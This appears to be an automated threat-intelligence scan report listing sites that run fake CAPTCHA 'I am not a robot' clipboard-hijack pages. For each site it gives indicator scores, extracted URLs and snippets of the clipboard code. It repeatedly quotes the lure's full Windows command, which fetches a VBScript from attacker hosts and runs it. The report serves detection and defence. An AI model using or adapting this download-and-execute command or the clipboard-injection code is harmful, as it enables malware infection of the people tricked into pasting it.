ClickGrab Report - January 02, 2026

5

base64

3

redirect chains

3

redirect follows

3

suspicious keywords

🔍 Suspicious Keywords 3

robot

Robot

hidden

🌐 Extracted URLs 63

https://gmpg.org/xfn/11

https://3.18.128.17/feed/

https://3.18.128.17/comments/feed/

https://api.w.org/

https://3.18.128.17/wp-json/

🔁 External JavaScript Redirect Chains

Showing first 2 of 3 chains (truncated for performance)

Script: https://3.18.128.17/wp-content/plugins/wpvr/public/js/video.js?ver=1

Type: script_src

Destination (first appearance): https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js

d in
 
 
         var script = document.createElement('script');
         script.src = this.options_['vtt.js'] || 'https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js';
 
         script.onload = function () {
           /**
            * Fired …

Script: https://3.18.128.17/wp-content/plugins/wpvr/public/lib/videojs-vr/videojs-vr.js?ver=1

Type: base64_payload

Destination (first appearance): https://www.w3.org/2000/svg

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="198px" height="240px" viewBox="0 0 198 240" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancodi…

🛰️ Redirect Follower Findings (3)

Source: external_js

Method: script_src

Original: https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js

Final: https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js

d in
 
 
         var script = document.createElement('script');
         script.src = this.options_['vtt.js'] || 'https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js';
 
         script.onload = function () {
           /**
            * Fired …

Status: ok

/* videojs-vtt.js - v0.14.1 (https://github.com/gkatsev/vtt.js) built on 10-04-2018 */
!function(a){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=a();else if("function"==typeof define&&define.amd)define([],a);else{var b;b="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this,b.vttjs=a()}}(function(){return function a(b,c,d){function e(g,h){if(!c[g]){if(!b[g]){var i="function"==typeof require&&require;if(!h&&i)return i(g,!0... [truncated]

Source: external_js

Method: base64_payload

Original: http://www.w3.org/2000/svg

Final: https://www.w3.org/2000/svg

Chain: http://www.w3.org/2000/svg

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="198px" height="240px" viewBox="0 0 198 240" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancodi…

Status: ok

<!DOCTYPE html>
<html lang="en">
<head>
  <title>SVG namespace</title>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  <link rel="stylesheet" type="text/css"
        href="https://www.w3.org/StyleSheets/TR/base"/>
</head>
<body>
<div class="head">
<p><a href="https://www.w3.org/"><img class="head"
src="https://www.w3.org/assets/logos/w3c/w3c-no-bars.svg" alt="W3C"/></a></p>
</div>
<p>
<strong>http://www.w3.org/2000/svg</strong> is an XML namespace, first defined in the 
... [truncated]

Source: external_js

Method: base64_payload

Original: http://www.videolan.org/x264.html

Final: http://www.videolan.org/developers/x264.html

Chain: http://www.videolan.org/x264.html

 ftypmp42isomiso2avc1mp41freemdatEH, #x264 - core 142 r2479 dd79a61 - H.264/MPEG-4 AVC codec - Copyleft 2003-2014 - http://www.videolan.org/x264.html - options: cabac=1 ref=1 deblock=1:0:0 analyse=0x1:0x111 me=hex subme=2…

Status: ok

    <!DOCTYPE html>
    <html lang="en" >
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
                    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
        
        <meta name="Author" content="VideoLAN" />
        <meta name="Keywords" content=
        "VideoLAN, VLC, VLC player, VLC media player, download, media player, player download, codec, encoder, m... [truncated]

https://174.142.195.203:444/

95 indicators detected

Score: 1201 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

20

suspicious keywords

4

high risk

🔍 Suspicious Keywords 20

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 7

https://t.me/Tarnkappe_info

https://174.142.195.203:444/

https://i.postimg.cc/k4zrz92z/111.png

http://198.13.158.127:5506/ny.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://104.199.248.167/

95 indicators detected

Score: 1201 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

20

suspicious keywords

4

high risk

🔍 Suspicious Keywords 20

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 7

https://t.me/Tarnkappe_info

https://104.199.248.167/

https://i.postimg.cc/k4zrz92z/111.png

http://198.13.158.127:5506/ny.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

http://52.40.97.75/

77 indicators detected

Score: 785 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info

https://i.postimg.cc/k4zrz92z/111.png

http://198.13.158.127:5506/ny.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

http://157.230.254.1/

75 indicators detected

Score: 735 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge

https://i.postimg.cc/k4zrz92z/111.png

http://78.40.209.164:5506/dk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://165.22.255.138/

75 indicators detected

Score: 735 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge

https://i.postimg.cc/k4zrz92z/111.png

http://78.40.209.164:5506/wk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://159.223.160.166/

75 indicators detected

Score: 735 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge

https://i.postimg.cc/k4zrz92z/111.png

http://78.40.209.164:5506/wk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://77.120.165.2/

75 indicators detected

Score: 735 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info

https://i.postimg.cc/k4zrz92z/111.png

http://198.13.158.127:5506/ny.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

http://213.199.33.111/

75 indicators detected

Score: 735 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info

https://i.postimg.cc/k4zrz92z/111.png

http://198.13.158.127:5506/ny.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

http://143.198.73.49/

75 indicators detected

Score: 735 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info

https://i.postimg.cc/k4zrz92z/111.png

http://198.13.158.127:5506/ny.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

http://77.120.165.2/

75 indicators detected

Score: 735 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info

https://i.postimg.cc/k4zrz92z/111.png

http://198.13.158.127:5506/ny.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://165.73.81.241:9809/

75 indicators detected

Score: 735 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge

https://i.postimg.cc/k4zrz92z/111.png

http://78.40.209.164:5506/dk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

http://45.79.216.201/

75 indicators detected

Score: 735 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info

https://i.postimg.cc/k4zrz92z/111.png

http://198.13.158.127:5506/ny.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://213.111.148.241/

75 indicators detected

Score: 735 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info

https://i.postimg.cc/k4zrz92z/111.png

http://198.13.158.127:5506/ny.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

http://198.89.99.22:8080/

75 indicators detected

Score: 735 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge

https://i.postimg.cc/k4zrz92z/111.png

http://78.40.209.164:5506/dk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

http://202.154.5.83:9092/

75 indicators detected

Score: 735 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info

https://i.postimg.cc/k4zrz92z/111.png

http://198.13.158.127:5506/ny.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

http://65.49.82.3/

75 indicators detected

Score: 735 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge

https://i.postimg.cc/k4zrz92z/111.png

http://78.40.209.164:5506/wk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://94.130.229.174/

75 indicators detected

Score: 735 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info

https://i.postimg.cc/k4zrz92z/111.png

http://198.13.158.127:5506/ny.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

http://69.48.143.20/

73 indicators detected

Score: 724 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png

http://78.40.209.164:5506/dk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://158.69.62.153/

73 indicators detected

Score: 724 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

19

suspicious keywords

3

high risk

🔍 Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';

command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png

http://78.40.209.164:5506/dk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

Threat Intelligence Report

Attack Pattern Analysis

Top Indicators/Keywords

Malicious Sites Detected

🔍 Suspicious Keywords 3

🌐 Extracted URLs 63

🔁 External JavaScript Redirect Chains

🛰️ Redirect Follower Findings (3)

🔍 Suspicious Keywords 20

🌐 Extracted URLs 7

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 20

🌐 Extracted URLs 7

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 5

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 19

🌐 Extracted URLs 5

📋 Clipboard Manipulation Code